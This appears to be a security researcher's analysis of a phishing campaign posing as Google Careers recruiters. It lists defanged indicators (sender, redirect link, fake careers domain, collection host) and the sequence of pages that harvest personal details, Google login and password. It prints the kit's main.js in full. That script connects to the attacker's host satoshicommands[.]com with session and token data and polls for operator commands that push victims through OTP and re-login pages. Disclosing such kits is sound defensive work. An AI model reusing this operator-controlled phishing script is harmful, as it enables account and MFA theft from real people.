Email Sender:
reply-ff2913777d64-449_HTML-1463564-534018293-0[@]s12[.]y[.]mc[.]salesforce[.]com
Link Embedded in 'View the role' button in the Email body:
cl[.]s12[.]exct[.]net (13.110.204.9 - Salesforce ASN)
Fake Google Careers Site (protected by Cloudflare Captcha:
apply[.]grecruitingwise[.]com (104.21.47.163 - Cloudflare ASN)
Site data is sent to via HTTP POST:
satoshicommands[.]com
https://www.reddit.com/r/programmatic/comments/1nk5r5b/anyone_else_getting_these_emails_from_google/ https://urlscan.io/result/019982b3-9e4d-7015-90b6-436e465241cf/#summary
Phishing Email arrives posing as a Google Careers recruiter:
Phishing Landing Page harvests personal data:
Secondary Phishing Landing Page asks for Google Account login email:
Next page asks for Password:
Fake "Processing your request" page is loaded
Observed "main.js" JavaScript in the main Page Body:
Function and location of where data is sent via an HTTP POST request:
function redirect_to($url){
window.location.href = $url;
}
$(function () {
const sid = $("#sessId").val();
const message = $("#appMessage").val();
const token = $("#appToken").val();
const chatId = $("#appChatId").val();
var socket = io('hxxps[:]//satoshicommands[.]com/', {
query: `room=${sid}&message=${encodeURIComponent(message)}&chatId=${chatId}&token=${token}`
});
// socket.on('action', data => {
// receiveMessage(data);
// });
setInterval(() => {
$.post('/gw.php', { action: 'command' }).done(function(response){
response = JSON.parse(response);
if(response.command) receiveMessage(response.command);
});
}, 2000);
function receiveMessage(data){
const parts = data.split(";");
switch(parts[0]) {
case "SMS":
redirect_to("/phoneotp");
return;
case "AUTH":
redirect_to("/auth");
return;
case "PHONE":
redirect_to("/phone");
return;
case "EMAIL":
redirect_to("/email");
return;
case "GCO":
redirect_to("/gco");
return;
case "SECURITYCODE":
redirect_to("/securitycode");
return;
case "SIGNREQUEST":
redirect_to(`/signinrequest?dv=${parts?.[2]}&sr=${parts?.[1]}`);
return;
case "COSTUM":
redirect_to(`/costum?txt=${parts?.[1]}`);
return;
case "BSEMAIL":
redirect_to("/login?again=true");
return;
case "WRONGPASS":
redirect_to("/signin?again=true");
return;
case "WRONGOTP":
redirect_to("/phoneotp?again=true");
return;
case "WRONGAUTH":
redirect_to("/auth?again=true");
return;
case "WRONGEMAIL":
redirect_to("/login?wrongemail=true");
return;
case "SUCCESS":
redirect_to("/success");
return;
}
};
});
// Start Home
function showSnackbar(txt) {
// Get the snackbar DIV
var x = document.getElementById("snackbar");
// Add the "show" class to DIV
x.innerHTML = txt;
x.className = "show";
// After 3 seconds, remove the show class from DIV
setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000);
}
// End Home
// Start Auth
let timer;
function getNewCode(seconds) {
const button = document.getElementById("getCode");
const showSeconds = document.getElementById("showSeconds");
const countdown = document.getElementById("seconds");
button.style.display = "none";
showSeconds.style.display = "block";
function updateCountdown() {
let minutes = Math.floor(seconds / 60);
let secs = seconds % 60;
countdown.textContent = `${String(minutes).padStart(2, '0')}:${String(secs).padStart(2, '0')}`;
if (seconds > 0) {
seconds--;
timer = setTimeout(updateCountdown, 1000);
} else {
button.style.display = "block";
showSeconds.style.display = "none";
}
}
updateCountdown();
}
// End Auth
VirusTotal Graph: https://www.virustotal.com/graph/embed/g81345fe3c2b94656a6bcc8bb5f14d568578e25872a7f4580a1292e45a9f1756d?theme=dark